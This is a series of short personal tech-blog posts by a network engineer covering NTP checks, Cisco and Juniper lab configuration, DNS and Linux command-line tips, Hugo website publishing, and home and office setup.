Mon, 13 Jul 2020 09:42:55 -0500

Accurate timestamps on network and server hardware is critical for daily operations and troubleshooting. The NTP service is used to keep the clocks in sync, but how can we tell if the services is running as expected?

By running ntpdate with the -q option (query only, don’t set date) we can validate the server is returning a proper answer:

jemurray@home-server:~$ ntpdate -q pool.ntp.org
server 163.237.218.19, stratum 1, offset 0.003985, delay 0.04179
server 72.30.35.88, stratum 2, offset 0.002441, delay 0.05338
server 74.6.168.72, stratum 2, offset 0.000726, delay 0.09357
server 98.191.213.1, stratum 2, offset -0.004938, delay 0.07932
13 Jul 09:42:28 ntpdate[9050]: adjust time server 163.237.218.19 offset 0.003985 sec

Bash one-liner to generate markdown images

Sun, 12 Jul 2020 12:18:50 -0500

I like these one line scripts that save a whole bunch of time. I wish the entire world knew the power of scripting from the command line!

A simple bash one(ish)-liner to generate the markdown syntax to display an entire directory of photos:

jemurray@mbp-2019:~/www/static/images/faucet $ for i in `ls -1` ; do echo " "; echo $i; echo "\![faucet](/images/faucet/$i)" | sed -e 's/^\\//g'; done

IMG_0385.JPG
![faucet](/images/faucet/IMG_0385.JPG)

IMG_0616.JPG
![faucet](/images/faucet/IMG_0616.JPG)

IMG_0968.JPG
![faucet](/images/faucet/IMG_0968.JPG)

IMG_0995.JPG
![faucet](/images/faucet/IMG_0995.JPG)

Installing Juniper vMX routers in GNS3

Sat, 11 Jul 2020 11:18:07 -0500

Overview

Step by step instructions for importing the Juniper vMX platform into GNS3 and creating a multi-router topology.

This guide uses the following software versions and setup:

Juniper vMX: 19.3R1.8
GNS3: 2.2.11 (with vmware appliance)
GNS3 desktop running on a macOS laptop
GNS3 remote server running on vmware, configured as the ‘main server’

Example of a complete multi-router vMX and Cisco lab:

Details

With an active support contract, download legal images directly from Juniper.

Moving configuration with the Juniper rename command

Fri, 10 Jul 2020 13:23:15 -0500

The Juniper platform has a feature which allows configuration sections to be moved (renamed) with the rename command. For example, moving a port configuration from one interface to another.

Original configuration:

[edit]
root@900w# show interfaces
ge-0/0/2 {
    unit 0 {
        family inet {
            address 192.168.0.1/24;
        }
    }
}

Moving the configuration:

[edit]
root@900w# rename interfaces ge-0/0/2 to ge-0/0/5

Validating the move:

[edit]
root@900w# show interfaces
ge-0/0/5 {
    unit 0 {
        family inet {
            address 192.168.0.1/24;
        }
    }
}

Copying a binary file over a serial console

Thu, 09 Jul 2020 11:48:09 -0500

In a previous life, I managed the global anycast DNS infrastructure for a large service provider. Late one night, a routine maintenance event went south and I ended up locked out of a critical DNS server.

To make matters more complicated, these systems were protected by strict IP filters on the network interfaces, host based firewalls, and a limited set of installed software.

The servers were deployed all over the world in several colocation facilities, some staffed by technicians, some not.

Why is the maximum MTU size 1472 bytes when using ping?

Wed, 08 Jul 2020 11:37:18 -0500

On most systems the default interface MTU size is set to 1500 bytes:

ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.86.5  netmask 255.255.255.0  broadcast 192.168.86.255
        inet6 fe80::20c:29ff:fe9f:7062  prefixlen 64  scopeid 0x20<link>
        inet6 2600:6c40:7e80:2515:20c:29ff:fe9f:7062  prefixlen 64  scopeid 0x0<global>
        ether 00:0c:29:9f:70:62  txqueuelen 1000  (Ethernet)
        RX packets 69  bytes 6460 (6.4 KB)
        RX errors 0  dropped 4842873  overruns 0  frame 0
        TX packets 52  bytes 5902 (5.9 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

By using the ping command we can validate our network path is capable of transferring 1500 byte packets. But why does the command fail when the packet size is set to 1500 bytes?

How to tell if a DNS record is a top-level zone

Tue, 07 Jul 2020 12:05:31 -0500

By querying for the SOA of a DNS record, we can determine if the answer is the top level-zone or not.

Using the host command, set the query option to return the SOA record. If an answer is returned, the record is part of the top-level zone:

jemurray@mbp-2019:~ $ host -t soa wustl.edu
wustl.edu has SOA record ns00.ip.wustl.edu. noc.wustl.edu. 2012476365 10800 3600 2419200 900

Sub-domains can be top level zones:

jemurray@mbp-2019:~ $ host -t soa nts.wustl.edu
nts.wustl.edu has SOA record ns00.ip.wustl.edu. noc.wustl.edu. 2776394 10800 3600 2419200 900

If there is no SOA record, the DNS entry is a standard record and not a top-level domain:

Using Hugo as a daily life log

Mon, 06 Jul 2020 12:03:42 -0500

I have been working on automating my daily journal with Hugo, vi, and a few bash scripts. The primary goal is to create a friction free system to update a journal entry every time I context switch between tasks or need to log something interesting.

The workflow starts by creating a new journal file every morning with the following bash script. If the journal file does not already exist, a new file is created using the current date as the name, vi is started for editing, and a live web server is loaded to view changes. When vi is closed, the file saves and the web server shuts down. I put this script in the search $PATH:

Using the sleep command on Cisco NX-OS to correlate log file events

Sun, 05 Jul 2020 06:08:30 -0500

Inserting a set amount of time by using the sleep XX statement between commands, can help to correlate multiple events in a log file by measuring the exact time between logged events.

Inserting a 5 second delay between commands on Cisco NX-OS:

nx7k-MPLS(config-if)# shut ; sleep 5 ; no shut

There was exactly 5 seconds between shutting and no-shutting an interface which helps to confirm the withdrawal and adding of routes in the IS-IS logs below:

Enable vim keybindings in vscode

Sat, 04 Jul 2020 06:29:05 -0500

Twenty five years ago vi became my primary text editor. Moving around with the h, j, k, and l as well as entering and exiting insert mode with i and <esc> has become second nature. Systems without a vim mode have h, j, k, l, and <esc> characters scattered throughout.

While vim is still my primary go-to editor, vscode is starting to play a more active roll while programming and editing markdown. As luck would have it, vscode has a vim mode extension.

Inserting date and time in vim using insert-mode mapping

Fri, 03 Jul 2020 14:01:17 -0500

Using a text file and vim, I keep a log file of daily events happening in my life and at work. Before every new event, I insert the current date and time. By using insert-mode key mappings, the date and time is automatically generated and inserted.

Add the following line to the ~/.vimrc file:

inoremap idt <C-R>=strftime("%c")<CR>

Open vim enter insert mode, and type: idt

Wed Jul  1 22:09:31 2020 - The date and time was inserted by pressing idt while in insert mode
~
~
~
~
~
~
~
~
~
~
~
~
~
~
-- INSERT --

Replacing the quick-release regulator on an old 1998 Weber grill

Thu, 02 Jul 2020 12:46:53 -0500

The Weber Genesis grills from 1998 use a quick-release style regulator, which looks similar to an air compress quick disconnect fitting. Tanks that use these adaptors no longer exist, are hard to fill, and are reaching their end of life in terms of safety.

By purchasing a the newer style QCC 21" regulator and a 1/8" to 3/4" flare adaptor, these grills can be converted to use the more widely available newer style tanks.

Using markdown and pandoc to write documentation

Wed, 01 Jul 2020 15:59:07 -0500

For those people who would rather write documentation and worry less about what system your company wants you to store it in, consider using a light weight language such as markdown paired with the conversion tool pandoc. This combination allows the writer to focus on the content and publish the final copies in any format pandoc can convert to such as pdf, html, epub, wiki, or docx.

Take the following markdown input:

Adding additional data columns to Wireshark

Tue, 30 Jun 2020 09:27:52 -0500

A stock instance of Wireshark looks similar to this with frames, time, source, destination, protocol, etc as the columns:

To add additional columns expand out, right click the field, and select Apply as Column:

For example, I have added sequence number, next sequence number, ack number, bytes in flight and iRRT to the default Wireshark columns:

Managed or edit the displayed columns by right clicking the column title bar:

Prioritizing (QoS) devices on home network routers

Mon, 29 Jun 2020 11:14:03 -0500

Sharing precious Internet bandwidth with an entire family of network hungry devices can be a problem. The kids Xbox, online streaming videos, social media, online backup software, is all competing for the last drop of Internet capacity. But what happens to that online meeting when there is no capacity left? Choppy audio, fuzzy video, and drops which lead to a poor experience and upset coworkers.

There is a solution. Many modern home routers have a feature to prioritize specific devices over non-essential ones. How to adjust these settings is router specific, but searching for QoS or device prioritization with your router model number should return the proper instructions.

Software on my iDevices (iPhone and iPad)

Sun, 28 Jun 2020 08:49:13 -0500

Examining the software on nerdy people’s devices is like having a window into their soul. How do they operate, what are they interested in, what makes them tick? Look no farther than the apps on their phones.

For those interested in knowing a little more about me, here is a list of the apps I have used within the past month on my iDevices.

Authentication:
- Duo: All personal systems are Duo 2FA integrated.
- LastPass: All accounts have unique passwords.
- Authenticator: I enable 2FA on every service that offers it.
Books:
- Libby: Library books.
- Kindle: Purchased books.
Files Management:
- Files (iCloud): iCloud is the ~/Documents directory across all devices.
- Google Drive: Used primarily for real-time document collaboration.
- Box: Work files.
Home Automation:
- EcoBee: Home thermostat.
- SmartThings: Light switches, buttons, and sensors.
- iRobot: Vacuums
- Google Home: Manages the Google Home devices.
- Google Wifi: Manages the home wireless network.
Kids:
- PowerSchool: Online report cards.
- PhotoMath: Solve math problems by taking a photo - Need I say more?
Mapping:
- Waze: Avoiding traffic and slowing down for speed traps.
- Google Maps: Finding stores.
- Gaia GPS: Backpacking and hiking maps with real-time tracking.
- Transit: Public transit schedule.
- Connect: Logging and displaying data from my Garmin watch.
- Cachly: GeoCaching, because adults still enjoy finding toys in the woods.
Messaging:
- Gmail: Personal email.
- Outlook: Work email.
- Messages: Text messages
- Slack: Personal and work communication.
- Teams: Work communication and meetings.
- Hangouts: Personal communication.
- GroupMe: Family and external group collaboration.
- Signal: Communicate privately.
Misc:
- AccuWeather: Fine weather app.
- AdGuard: Browsing the web ad free on mobile devices.
- Gboard: Swipe keyboard.
- Tile: Find lost stuff.
- Translate: Language translation for written, spoken, and images.
News:
- Reddit: News, current events, and entertainment.
- Miniflux (shortcut to website): RSS feeds aggregate here. From personal blogs, news sites, to vendor information.
- Reeder: Alternative reader attached to Miniflux RRS feed aggregator.
- Podcasts
- HackerNews (shortcut to website): If I could only read one technology news site, this would be it.
- STLPublicRadio: St. Louis public radio is my local news source.
Note Taking / Documentation:
- Evernote: Personal notes, journals, bookmarks, receipts, todo, etc.
- Confluence: Of all the wiki-like collaboration software I have used, this is my least favorite, but work uses it so I have no choice.
- One Note: Work meeting notes.
- Voice Memos: Sometimes there is no substitute for recorded voice.
Photo Management
- Camera: Stock camera.
- Google Photos: All photos backup here.
- Photos: All photos go into iCloud
- PhotoScan: Excellent photo scanner.
Productivity:
- Note: these apps are an exception to the past month rule. I keep them all so I can open any file sent to me.
- Word
- Excel
- PowerPoint
- Docs
- Sheets
- Pages
- Numbers
- Keynote
Programming / Text Editing / Remote Management:
- Blink: Combines Mosh, SSH, and CLI tools all in a single app.
- Textastic: Text editor for coding and markdown that integrates well with iDrive.
Shopping:
- Amazon: Online shopping.
Social:
- Twitter: Mostly to keep up on #WUSTL and my kids’ school events.
- LinkedIn: Business contacts.
Task Management:
- Google Calendar: Personal and family life management.
- Outlook: Work life management.
- Planner: Work projects and tasks management.
Video / Music:
- YouTube Premium: Ad free music and videos.
- Netflix: The original video streaming service.
- HBO Go: Free with my ATT cell plan.
- Prime Video: Included with Prime.
- YouTube TV: Primary TV service. Works on every device from phones to a $35 Roku, with unlimited DVR for half the cost of satellite or cable.
- YouTube Music: Streaming music for the entire family.
Web:
- Safari: Primary browser, I would switch to Chrome if Apple allowed user-controlled default applications.
- Chrome: Alternative to Safari when needed.
- Duck Duck Go: Browsing the web when privacy matters.
Work / Consulting:
- AnyConnect: Work VPN.
- Zoom: Remote meetings.
- Meraki: My kids school uses Meraki network equipment which I maintain.
- HE Network Tools: ping, traceroute, iperf3, whois, subnet calc.
- PayPal Here: I take credit cards.
- Venmo: I pay people.
- Duet: Dual displays when I am on the go.

Front page of the iPhone:

Using Python to find IP addresses in a text file

Sat, 27 Jun 2020 16:45:50 -0500

Given a text file with IP address randomly placed within it:

jemurray@mbp-2019:~/Documents/scripts/wustlPython $ cat ipsampleinput.txt
This is a text file with ip address: 192.168.1.1 within it, there are more addresses like this one 10.23.12.1
sprinkled throughout the 1.2.3.4 file.  SomeRight10.3.3.2Next to each other some spaced apart.

The following Python script will extract all IP address within the file:

#!/usr/local/bin/python3

import fileinput
import re

for line in fileinput.input():
    ip = re.findall( r'[0-9]+(?:\.[0-9]+){3}', line )
    if ip:
        for i in ip:
            print(i)

Output:

How to log into the FirePower FTD CLI

Fri, 26 Jun 2020 17:11:00 -0500

Logging into a Cisco FirePower FTD CLI is not an obvious operation.

First log into FXOS chassis manager:

jemurray@mbp-2019:~ $ ssh firepower.example.com
Password:
Last login: Fri Jun 26 16:52:28 CDT 2020 from bastion.example.com on pts/0

Copyright 2004-2018, Cisco and/or its affiliates. All rights reserved.
Cisco is a registered trademark of Cisco Systems, Inc.
All other trademarks are property of their respective owners.

Cisco Fire Linux OS v6.2.3 (build 13)
Cisco Firepower 9000 Series SM-36 Threat Defense v6.2.3.12 (build 80)

Cisco Firepower Extensible Operating System (FX-OS) Software.
 TAC support: http://www.cisco.com/tac
 Copyright (c) 2009-2016, Cisco Systems, Inc. All rights reserved.
 The copyrights to certain works contained in this software are owned by other third parties and used and distributed under license.
 Certain components of this software are licensed under the 'GNU General Public License, version 3'
 provided with ABSOLUTELY NO WARRANTY under the terms of 'GNU General Public License, Version 3', available here:
 http://www.gnu.org/licenses/gpl.html. See User Manual (''Licensing'') for details.
 Certain components of this software are licensed under the 'GNU General Public License, version 2'
 provided with ABSOLUTELY NO WARRANTY under the terms of 'GNU General Public License, version 2', available here:
 http://www.gnu.org/licenses/old-licenses/gpl-2.0.html. See User Manual (''Licensing'') for details.
 Certain components of this software are licensed under the 'GNU LESSER GENERAL PUBLIC LICENSE, version 3'
 provided with ABSOLUTELY NO WARRANTY under the terms of 'GNU LESSER GENERAL PUBLIC LICENSE' Version 3, available here:
 http://www.gnu.org/licenses/lgpl.html. See User Manual (''Licensing'') for details.
 Certain components of this software are licensed under the 'GNU Lesser General Public License, version 2.1'
 provided with ABSOLUTELY NO WARRANTY under the terms of 'GNU Lesser General Public License, version 2', available here:
 http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html. See User Manual (''Licensing'') for details.
 Certain components of this software are licensed under the 'GNU Library General Public License, version 2'
 provided with ABSOLUTELY NO WARRANTY under the terms of 'GNU Library General Public License, version 2', available here:
 http://www.gnu.org/licenses/old-licenses/lgpl-2.0.html. See User Manual (''Licensing'') for details.


	    Cisco Security Services Platform
		  Type ? for list of commands
Firepower-module1>

Connect to the FTD. This is the firewall module of the FirePower:

git broken after 10.14.x to 10.15.x macOS upgrade

Thu, 25 Jun 2020 20:56:46 -0500

After upgrading macOS from 10.14.x to 10.15.x git no longer worked:

jemurray@mbp-2019:~ $ git
xcrun: error: invalid active developer path (/Library/Developer/CommandLineTools), missing xcrun at: /Library/Developer/CommandLineTools/usr/bin/xcrun

Tried this:

jemurray@mbp-2019:~ $ xcode-select --install
xcode-select: note: install requested for command line developer tools

Which raised the following error:

Tried this, with no success:

jemurray@mbp-2019:~ $ sudo xcode-select --reset

Manually downloaded the latest xcode from the App Store:

Manually downloading the software is getting us closer:

Roomba creates Wifi Coverage Maps

Wed, 24 Jun 2020 08:44:44 -0500

Need a wireless survey of your home? Have a vacuum? With a Roomba 900 series vacuum wireless surveys are built in:

I have no coverage area problems…

VIRL NX-OS licensing disabled

Tue, 23 Jun 2020 12:27:36 -0500

The NX-OS images that come with VIRL, which I am running in GNS3, do not have licensing enabled. Attempting to enable a feature will result in the following error:

switch(config)# feature bgp
Feature grace period is disabled

To enable licensing run:

switch(config)# license grace-period
switch(config)#

Now enable the feature:

switch(config)# feature bgp
LAN_ENTERPRISE_SERVICES_PKG license not installed. bgp feature will be shutdown
after grace period of approximately 120 day(s)
switch(config)# 2020 Jun 22 22:28:45 switch %LICMGR-2-LOG_LIC_NO_LIC: No license(s) present for feature LAN_ENTERPRISE_SERVICES_PKG. Application(s) shut down in 119 days.
2020 Jun 22 22:28:45 switch %LICMGR-2-LOG_LICAPP_NO_LIC: Application bgp running without LAN_ENTERPRISE_SERVICES_PKG license, shutdown in 119 days

Using the macOS command airport to perform wireless signal strength scans

Mon, 22 Jun 2020 16:25:29 -0500

There is a hidden command in macOS, airport, which is used to view wireless signal strength from the command line. By wrapping the airport command in a simple shell script, we can search for and sort wireless networks by their signal strength.

I have used this command to perform site surveys and validation of signal strength after wireless hardware deployment.

The airport command is not in the default search $PATH: /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport.

Basic script writing

Sun, 21 Jun 2020 07:52:54 -0500

Basic script writing is a tool any person who performs repetitive tasks on a computer should posses. Scripting comes in many forms from simple bash scripts to more complex python scripts. These small snippets of code help reduce the monotony of manually running the same command over and over again.

Let’s use the following example. At WashU there are 5 DNS servers. Validating DNS is operating as expected during maintenance events is a common task.

Generating a password hash on Linux from the command line

Sat, 20 Jun 2020 11:42:04 -0500

Summary

The command mkpasswd generates a password hash from the command line. We can use the resulting output in any application where an md5, des, or sha hash is required.

Details

Running mkpasswd with the options -m help displays the available hash methods:

jemurray@linux-host:~$ mkpasswd -m help
Available methods:
des	standard 56 bit DES-based crypt(3)
md5	MD5
sha-256	SHA-256
sha-512	SHA-512ZZ

Generate the SHA-512 hash with the password ’test':

jemurray@linux-host:~$ mkpasswd -m SHA-512
Password:
$6$DIv5K.HO$YhcGCcZGEipD6gmopK.rCYNTfUhNV5hsy9/LhT89odM0jd/lIyGgOX5l.v1hRFV.EDXeK/IRpYQNXgv0inmW50

In this example, the hash is added to a puppet manifest for managing user accounts:

No man on Debian 10

Fri, 19 Jun 2020 13:37:41 -0500

The default install of Debian 10 does not have man installed by default. Attempting to view a man page results in the following error:

jemurray@shell:/usr/bin$ man basename
-bash: man: command not found

In the 20+ years I have used Linux, I have never found a distribution that didn’t have man installed, but appears so:

jemurray@shell:/usr/bin$ which man
jemurray@shell:/usr/bin$

jemurray@shell:/usr/bin$ /usr/bin/man
-bash: /usr/bin/man: No such file or directory

jemurray@shell:/usr/bin$ /bin/man
-bash: /bin/man: No such file or directory

jemurray@shell:/usr/bin$ whereis man
man: /usr/local/man /usr/share/man /usr/share/man/man7/man.7.gz

Install man:

Quickly find changes in network configurations files with diff

Thu, 18 Jun 2020 16:52:20 -0500

The diff utility is excellent for quickly spotting changes in network configuration files. After all major network changes, upgrades, or maintenance this is one of my staple commands to validate there are no unexpected changes. It is especially helpful for router configurations that are thousands of lines long.

Start with a quick overview of what changed, by running diff with no options:

jemurray@mbp-2019:~ $ diff previous-config.txt current-config.txt
60c60
< username jemurray privilege 15 password 0 CiscoLab123
---
> username jemurray privilege 15 password 0 CiscoLab
87a88
>  description Uplink Interface
94d94
<  description shutdown

Find specific differences line-by-line in side-by-side mode, by running: diff -W 120 -y previous-config.txt current-config.txt

Archetypes in Hugo for new post templates

Wed, 17 Jun 2020 17:15:26 -0500

Hugo archetypes provide a templating mechanism when creating a new post with the command: hugo new path/file.md.

By default, Hugo uses a template that looks similar to this:

jemurray@mbp-2019:~/Documents/www-personal/current/jasonmurray.org/themes/hermit/archetypes $ cat posts.md
---
title: "{{ replace .Name "-" " " | title }}"
date: {{ .Date }}
draft: true
toc: false
images:
tags:
  - untagged
---

To change the default template, create the file $hugoroot/archetypes/posts.md. Do not edit the archetype file in the individual themes directory, it will be replaced when the theme is updated. In this example, I added a category field:

Filter ads on iOS with AdGuard

Tue, 16 Jun 2020 06:31:03 -0400

Summary

AdGuard, a content blocker for multiple platforms, is an effective solution for blocking ads on iOS such as the iPhone or iPad.

Quick Install:

Install AdGuard from the App Store.
Enable blocking: Settings -> Safari -> Content Blockers, enable all filters.

Details

Search for adguard in the App Store and install:

Open the app to validate AdGuard is enabled. The screen may look different, this is the premium version of AdGuard:

Removing cookie pop-ups with uBlock Origin

Mon, 15 Jun 2020 06:06:45 -0400

Summary

Websites that require users to accept the “We use cookies…” pop-up messages is an unfortunate side effect of the GDPR regulation. While I fully support a users control over their data and the added benefits regulations such as GDPR provide, the pop-up messages are too excessive.

The uBlock Origin EasyList Cookie filter will automatically remove these annoying pop-up messages.

Details

Example website with the “We use cookies…” pop-up message:

Generate a Hugo website with the post-receive GIT hook

Sun, 14 Jun 2020 07:58:28 -0500

Summary

By storing Hugo website content in a git repository, a user can checkout the site from any git enabled workstation, make changes, then automatically build and deploy the site with a git push action to a remote repository. The git hook post-receive enables this automation. git hooks are a method for executing scripts when specific git actions are taken.

Details

Setup a web server and Hugo on an Internet connected server, instructions are outside the scope of this document.

Self hosting a git repository

Sat, 13 Jun 2020 17:37:11 -0500

Summary

git, a free and open source distributed version control system, has a number online services for hosting projects. When control over data or additional features are required, self-hosting a git repository may be a better choice. With a simple Internet connected Linux server running SSH, setting up a remote git repository is easy to do.

On the remote server:

mkdir git
cd git
mkdir jasonmurray.org.git
cd jasonmurray.org.git/
git init --bare

On the local source:

Basic Cisco and Juniper router configurations for remote management

Fri, 12 Jun 2020 07:15:58 -0500

This is the minimum configuration necessary to configure Cisco and Juniper routers for remote management via SSH. I use the following base template configurations to enable IP via DHCP and SSH remote access for the lab environment.

Cisco pastable:

hostname csr100v
ip domain-name example.com
aaa new-model
aaa authentication login default local
aaa authorization exec default local
crypto key generate rsa modulus 2048
username jemurray privilege 15 password MyPassword
interface GigabitEthernet0/1
 ip address dhcp
 no shut
ip ssh version 2
line vty 0 4
 privilege level 15
 transport input ssh
line vty 5 15
 privilege level 15
 transport input ssh

Juniper pastable:

10Gb/s file transfers with SMBv3

Thu, 11 Jun 2020 15:03:53 -0500

Summary

High performance file transfers over the network can be a challenge due to limited network capacity, operating system tuning, file system tuning, bus speed, and drive performance. However, with the right hardware and a little bit of tuning, a Windows 10 workstation can saturate a 10Gb/s interface with SMBv3 file transfers.

Using robocopy and powershell scripts, we see how disk caching and MTU changes affect the performance of a stock Windows 10 Pro workstation while attempting to fill 10Gb/s network paths to their capacity.

Is the meeting necessary?

Wed, 10 Jun 2020 07:09:09 -0500

Too often, meeting invites look like this. It lacks necessary details, no agenda, no goals, only the request for a number of people to get together and “do something about a project”. Is it a big project? What about preread material? Does eveyone need to be there? What are the deliverable in the “kickoff” meeting?

To keep engineers happy, consider the following guidelines:

Prior to sending the invite:

Using nsupdate to make dynamic DNS changes

Tue, 09 Jun 2020 09:49:33 -0500

The command, nsupdate is used to perform dynamic DNS updates from the CLI.

Before the dynamic update:

jemurray@linux-host:~ $ host dyntest.jason.example.com
Host dyntest.jason.example.com not found: 3(NXDOMAIN)

Running the dynamic update command:

jemurray@linux-host:~$ nsupdate
> server 192.168.0.1
> update add dyntest.jason.example.com 86400 A 127.0.0.1
> send

If the dynamic updates fails, verify there are no ACL’s prohibiting dynamic updates:

May 11 08:14:20 192.168.0.1 named[31289]: client 192.168.3.4#61452: update 'jason.example.com/IN' denied

The allow-update line is used to control which IP addresses are allowed to send dynamic updates:

Tails Linux wipes active memory when the USB drive is removed

Mon, 08 Jun 2020 07:48:46 -0500

Tails Linux will automatically shut down and forcibly erase memory of the running operating system if the USB drive is removed while powered on:

Tails erases active memory by using a custom udev watch-dog binary:

amnesia@amnesia:/etc/udev/rules.d$ ps -ef | grep wat
root      5877     1  0 00:59 ?        00:00:00 /bin/sh /usr/local/lib/udev-watchdog-wrapper
root      5886  5877  0 00:59 ?        00:00:00 /usr/local/sbin/udev-watchdog /devices/pci0000:00/0000:00:14.0/usb2/2-1/2-1:1.0/host1/target1:0:0/1:0:0:0/block/sdb/sdb1 disk

Full details can be found here.

Using the parallel command to speed up log file processing

Sun, 07 Jun 2020 10:07:53 -0500

Summary

Processing large log files from the command line using tools such as cat, grep, and awk can be time consuming. By using the command parallel, processing time can be reduced significantly.

In this example, the time it took to search through 24 large log files went from 130 seconds to 26 second by using the parallel command:

[jemurraylinux-host 2020-06-01]$ time ls -1 smb_files.*.gz | parallel -P5 "zcat {} | grep scipy | wc" | awk '{sum+=$1} END {print sum}'
1557855

real	0m26.019s

Details

Example input data is 24 hours of SMB access logs:

My backup plan

Sat, 06 Jun 2020 09:48:52 -0500

Without a solid backup plan, it is not a question of IF data will be lost, but WHEN.

Summary

By using a combination of iCloud, BackBlaze, Google Photos, Timemachine, and a few external disks, I have developed a highly reliable backup solution for the most valuable data I own.

Requirements

A reliable backup plan has the following requirements. Any exceptions to these rules will eventually result in loss of data:

SMB drive access problem within Administrator PowerShell terminal

Fri, 05 Jun 2020 10:11:12 -0500

Summary

Mounting a remote SMB drive under a regular user, then trying to access it via the Administrator account within PowerShell results in the following error:

dir : Cannot find path '\\storage1.example.com\dir' because it does not exist.

To resolve this problem, use the net use command under an Administrator PowerShell terminal.

Details

SMB drive mounted via the GUI under the local user account:

Attempting to access the share under the Administrator PowerShell user generates the following error:

My COVID19 work-from-home-office

Thu, 04 Jun 2020 08:00:00 -0500

Today marks 80 days of working from home because of COVID19. The picture below is a view of my evolving home office setup:

Starting at the foundation, the desk is a sturdy folding table. It is a little too high, but the adjustable chair and foot rest help to compensate.

The keyboard on the 2019 laptop stopped working. This is a known issue, but I can’t afford to be without a laptop for days or weeks. An external keyboard is working as a good substitute for now. Yes, there is a spare laptop on the desk, but this would require more work to rebuild right now.

Helpful commands when troubleshooting IS-IS on Cisco routers

Wed, 03 Jun 2020 08:58:31 -0500

Validate IS-IS is running on an interface:

iosv-1#show isis protocol

Tag 65010:
IS-IS Router: 65010
  System Id: 1921.6800.0001.00  IS-Type: level-1-2
  Manual area address(es):
	49
  Routing for area address(es):
	49
  Interfaces supported by IS-IS:
	GigabitEthernet0/1 - IP
	GigabitEthernet0/2 - IP
	Loopback0 - IP

Show IS-IS neighbor adjacency:

iosv-1#show isis neighbors

Tag 65010:
System Id       Type Interface     IP Address      State Holdtime Circuit Id
iosv-2          L2   Gi0/2         10.0.0.6        UP    27       01

Find a specific IS-IS prefix entry:

BrassCraft Multi-Turn Angle Valve seal replacement

Tue, 02 Jun 2020 07:43:15 -0500

E L L I O T ! ! ! GET THE TOWELS! I hear my wife screaming downstairs. THE TOILET IS OVERFLOWING!

The BrassCraft multi-turn angle valve in our bathroom was seized tight and when it finally broke loose, no longer shut off the water to the toilet. This was a problem because the fill valve in the toilet stopped working and would not shut off either.

The valve on the water supply line looks like this. It is fully closed, yet still slowly leaks water:

m is the CLI for macOS

Mon, 01 Jun 2020 08:34:31 -0500

Not all tasks are easy to perform with a GUI, the CLI opens up a new realm of possibilities with scripting, automation, and simplified work flows.

m is a 3rd party tool for interacting with macOS via the CLI.

Install m:

brew install m-cli

Example command with m:

jemurray@mbp-2019:~ $ sudo m firewall status
Firewall is enabled. (State = 1)

The full command set:

jemurray@mbp-2019:~ $ m

  Swiss Army Knife for macOS ! 


usage:  m [OPTIONS] COMMAND [help]

    OPTIONS
        --update        update m-cli to the latest version
        --uninstall     uninstall m-cli

    COMMANDS:
        help
        battery
        bluetooth
        dir
        disk
        display
        dns
        dock
        finder
        firewall
        flightmode
        gatekeeper
        group
        hostname
        info
        itunes
        lock
        network
        nosleep
        notification
        ntp
        printer
        restart
        safeboot
        screensaver
        service
        shutdown
        sleep
        timezone
        trash
        update
        user
        volume
        vpn
        wallpaper
        wifi

As an example, I was able to use m to automate desktop builds using Ansible. Having the right tool for the job is invaluable.

My home lab setup

Sun, 31 May 2020 10:55:26 -0500

Summary

As an infrastructure architect, the lab environment plays a significant role to validate design ideas, confirm configuration changes, and build new skills.

My home lab has evolved over the past 20 years, moving from a complete rack of hardware, down to a single server, back to multiple servers, then completely outsourced to the cloud. In recent years the physical servers have returned to run compute hungry workloads like GNS3 and VIRL, as well as ESXi appliances that are easier to host locally than from remote.

Opening applications from the command line in macOS

Sat, 30 May 2020 11:10:46 -0500

Summary:

Open an app from the commandline:

open macosopen.md

Details:

Using a specific application

Open a specific application with the -a option.

In the example below the . specifies the current working directory should be opened. In Visual Studio Code, this is the equilivant to opening a workspace:

jemurray@mbp-2019:~/www $ open -a 'Visual Studio Code' .
jemurray@mbp-2019:~/www

Open multiple instances

The same application can be opened in a new instance by using the -n option.

Using an iPad as a second monitor on a MacBook Pro

Fri, 29 May 2020 14:33:52 -0500

Summary

The Duet desktop and app software can extend an iPad as a second monitor. Using an iPad as a second display is helpful when traveling and extra screen realestate is important.

Details

Note: with the release of Catalina and SideCar you may be able to avoid purchasing Duet, Compare the differences here.

However, if you don’t have Catalina, use a Windows PC, or need more advanced features, Duet Air 2.0 may be the software you are looking for.

Using iCloud to sync open text files between Visual Studio Code and Textastic

Thu, 28 May 2020 14:38:52 -0500

Synchronizing files between different devices within shared file storage can be a challenge to avoid data corruption. By using iCloud drive as the file storage system along with the text editing tools Visual Studio Code and Textastic, changes are automatically propagated without having to refresh or reload the content. This is helpful to avoid data corruption when multiple versions of the same file are open on different devices.

The following YouTube video shows an example of Visual Studio Code in the background and Textastic in the foreground.

How I managed website content with Hugo and text editors

Wed, 27 May 2020 07:41:22 -0500

Summary

Create new post: hugo new posts/mynewpost.md
Start development server: hugo -D server
Edit content in your favorite editor: vi posts/mynewpost.md
Check grammer in ProWritingAid
Validate look and feel of site: http://localhost:1313
Publish content: rsync -av --delete ~jemurray/Documents/www-personal/current/jasonmurray.org/public/ shell.jasonmurray.org:/var/www/html

Details

Tools

Code editor: vi, Visual Studio Code, Textastic, etc.
Static website generator: Hugo
Hosting: Digital Ocean VSP (small instance)

Create new post

Everything starts out in either a terminal or Visual Code Studio (VSC). In this post, I will switch between iTerm2 and VSC terminals and various editors depending on need.

Using Ansible to manage a network engineers workstation

Tue, 26 May 2020 08:18:34 -0500

Overview

I created an Ansible playbook to configure my macOS laptop. The goal is to create an automation work-flow to consistently (re)build my or another network engineers workstation from scratch. By using cloud hosted file storage, the primary job of this playbook is to install the proper software and (re)symlink configuration files.

Besides the Google and Box drive tasks, the majority of the configuration should work for almost anyone, see Post Configuration for more details about the cloud file storage systems.

Persistant terminal logging in iTerm2

Mon, 25 May 2020 05:35:16 -0500

Summary

Enable terminal logging for all sessions:

iTerm2 -> Preferences... -> Profiles (Default) -> Session -> Automatically Log... -> /path/to/logfiles

Details

Much of my day is spent in a terminal session using ssh, vim, or the Unix shell.

Terminal logging is invaluable to capture output, remember command syntax, review troubleshooting steps, or go back in history.

iTerm2 has a feature that automatically logs all terminal output to a text file.

Configuration:

SMB: Cannot mount //path/folder read-only

Sun, 24 May 2020 10:11:19 -0500

Summary

Install the cifs-utils package on Linux if you receive this error mount: cannot mount //path/folder read-only when trying to mount a remote SMB file system.

Details

